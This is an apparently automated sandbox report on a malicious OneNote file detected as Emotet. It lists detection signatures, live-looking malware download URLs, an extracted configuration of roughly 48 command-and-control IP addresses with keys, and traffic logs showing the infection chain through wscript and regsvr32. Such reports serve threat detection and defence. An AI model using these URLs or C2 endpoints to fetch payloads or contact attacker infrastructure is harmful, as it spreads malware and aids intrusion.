Windows Analysis Report
Insight_Medical_Publishing.one

Overview

General Information

Sample Name: Insight_Medical_Publishing.one
Analysis ID: 828491
MD5: ff762b2f28c3bcaaabcc6f7656f92d50
SHA1: 9448c2d43c1e7155a4003d513c95f42fd29a2b7f
SHA256: 62ff7b52aeac2e32e59d8168cd55db1522de07833d476c8e26b36f40724bbebe
Tags: one
Infos:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Malicious OneNote
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Insight_Medical_Publishing.one ReversingLabs: Detection: 30%
Source: Insight_Medical_Publishing.one Virustotal: Detection: 40% Perma Link
Antivirus detection for URL or domain
Source: https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/D Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/ Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/ Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/ Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/ Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0 Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/tM Avira URL Cloud: Label: malware
Source: http://softwareulike.com/cWIYxWMPkK/ Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/jesecsgigcdk/zfgrij/wjhswvhm/ Avira URL Cloud: Label: malware
Source: http://softwareulike.com/cWIYxWMPkK/yM Avira URL Cloud: Label: malware
Source: https://182.162.143.56/jesecsgigcdk/zfgrij/wjhswvhm/ Avira URL Cloud: Label: malware
Source: https://91.121.146.47:8080/ Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/ Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/D Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/ Avira URL Cloud: Label: malware
Source: https://164.90.222.65:443/jesecsgigcdk/zfgrij/wjhswvhm/ Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/: Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllG Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6 Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/a Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/vM Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/RPROFIN Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/xM Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/jesecsgigcdk/zfgrij/wjhswvhm/ Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/ Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/RPROFII Avira URL Cloud: Label: malware
Source: https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/ Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/o8 Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/&C Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/ Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/LE=C: Avira URL Cloud: Label: malware
Source: https://penshorn.org:443/admin/Ses8712iGR8du/script.createobject( Avira URL Cloud: Label: malware
Source: https://164.90.222.65/jesecsgigcdk/zfgrij/wjhswvhm/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll ReversingLabs: Detection: 58%
Source: C:\Windows\System32\CRCPqQPgWxqcgJu\zBLf.dll (copy) ReversingLabs: Detection: 58%
Source: 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5cZosrQAhAJI=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx285qirQAHAJQ="]}
Source: unknown HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49685 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49689 version: TLS 1.2
Source: Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdbain.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: OneNote15WatsonLog.etl.0.dr
Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008D28 FindFirstFileExW, 3_2_0000000180008D28

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process created: C:\Windows\SysWOW64\wscript.exe

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 164.90.222.65 443 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 203.26.41.131 443 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Domain query: penshorn.org
Source: C:\Windows\System32\regsvr32.exe Network Connect: 66.228.32.31 7080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 187.63.160.88 80 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 104.168.155.143 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 91.121.146.47 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 160.16.142.56 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 182.162.143.56 443 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 167.172.199.165 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 163.44.196.120 8080 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.4:49689 -> 182.162.143.56:443
Source: Traffic Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.4:49686 -> 91.121.146.47:8080
Source: Traffic Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.4:49688 -> 66.228.32.31:7080
Source: Traffic Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.4:49691 -> 167.172.199.165:8080
Source: Traffic Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.4:49696 -> 104.168.155.143:8080
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 91.121.146.47:8080
Source: Malware configuration extractor IPs: 66.228.32.31:7080
Source: Malware configuration extractor IPs: 182.162.143.56:443
Source: Malware configuration extractor IPs: 187.63.160.88:80
Source: Malware configuration extractor IPs: 167.172.199.165:8080
Source: Malware configuration extractor IPs: 164.90.222.65:443
Source: Malware configuration extractor IPs: 104.168.155.143:8080
Source: Malware configuration extractor IPs: 163.44.196.120:8080
Source: Malware configuration extractor IPs: 160.16.142.56:8080
Source: Malware configuration extractor IPs: 159.89.202.34:443
Source: Malware configuration extractor IPs: 159.65.88.10:8080
Source: Malware configuration extractor IPs: 186.194.240.217:443
Source: Malware configuration extractor IPs: 149.56.131.28:8080
Source: Malware configuration extractor IPs: 72.15.201.15:8080
Source: Malware configuration extractor IPs: 1.234.2.232:8080
Source: Malware configuration extractor IPs: 82.223.21.224:8080
Source: Malware configuration extractor IPs: 206.189.28.199:8080
Source: Malware configuration extractor IPs: 169.57.156.166:8080
Source: Malware configuration extractor IPs: 107.170.39.149:8080
Source: Malware configuration extractor IPs: 103.43.75.120:443
Source: Malware configuration extractor IPs: 91.207.28.33:8080
Source: Malware configuration extractor IPs: 213.239.212.5:443
Source: Malware configuration extractor IPs: 45.235.8.30:8080
Source: Malware configuration extractor IPs: 119.59.103.152:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 95.217.221.146:8080
Source: Malware configuration extractor IPs: 153.126.146.25:7080
Source: Malware configuration extractor IPs: 197.242.150.244:8080
Source: Malware configuration extractor IPs: 202.129.205.3:8080
Source: Malware configuration extractor IPs: 103.132.242.26:8080
Source: Malware configuration extractor IPs: 139.59.126.41:443
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 183.111.227.137:8080
Source: Malware configuration extractor IPs: 5.135.159.50:443
Source: Malware configuration extractor IPs: 201.94.166.162:443
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 79.137.35.198:8080
Source: Malware configuration extractor IPs: 172.105.226.75:8080
Source: Malware configuration extractor IPs: 94.23.45.86:4143
Source: Malware configuration extractor IPs: 115.68.227.76:8080
Source: Malware configuration extractor IPs: 153.92.5.27:8080
Source: Malware configuration extractor IPs: 167.172.253.162:8080
Source: Malware configuration extractor IPs: 188.44.20.25:443
Source: Malware configuration extractor IPs: 147.139.166.154:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 185.4.135.165:8080
Source: Malware configuration extractor IPs: 45.176.232.124:443
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /jesecsgigcdk/zfgrij/wjhswvhm/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 110.232.117.186 110.232.117.186
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49686 -> 91.121.146.47:8080
Source: global traffic TCP traffic: 192.168.2.4:49688 -> 66.228.32.31:7080
Source: global traffic TCP traffic: 192.168.2.4:49691 -> 167.172.199.165:8080
Source: global traffic TCP traffic: 192.168.2.4:49696 -> 104.168.155.143:8080
Source: global traffic TCP traffic: 192.168.2.4:49697 -> 163.44.196.120:8080
Source: global traffic TCP traffic: 192.168.2.4:49698 -> 160.16.142.56:8080
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 17
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: wscript.exe, 00000001.00000003.406123541.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410685138.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407893232.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
Source: regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/Low
Source: regsvr32.exe, 00000004.00000003.631557827.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488456435.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632847163.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000002.632774627.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?36fdbbb7baea3
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ozmeydan.com/cekici/9/
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ozmeydan.com/cekici/9/xM
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
Source: wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405065761.000000000599E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0
Source: wscript.exe, 00000001.00000003.404701229.0000000005980000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404904476.000000000598C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/D
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
